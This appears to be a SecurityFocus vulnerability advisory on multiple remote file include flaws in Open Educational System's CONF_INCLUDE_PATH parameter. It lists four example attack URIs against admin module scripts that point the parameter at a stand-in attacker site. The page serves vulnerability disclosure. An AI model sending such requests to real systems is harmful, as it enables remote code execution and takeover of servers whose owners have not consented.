Open Educational System 'CONF_INCLUDE_PATH' Parameter Multiple Remote File Include Vulnerabilities

An attacker can exploit these issues via a browser.

The following example URIs are available:

http://www.example.com/[path]/admin/modules/modules/forum/admin.php?CONF_INCLUDE_PATH=attacker's site
http://www.example.com/[path]/admin/modules/modules/plotgraph/index.php?CONF_INCLUDE_PATH=attacker's site
http://www.example.com/[path]/admin/modules/user_account/admin_user/mod_admuser.php?CONF_INCLUDE_PATH=attacker's site
http://www.example.com/[path]/admin/modules/user_account/ogroup/mod_group.php?CONF_INCLUDE_PATH=attacker's site


 

Privacy Statement
Copyright 2010, SecurityFocus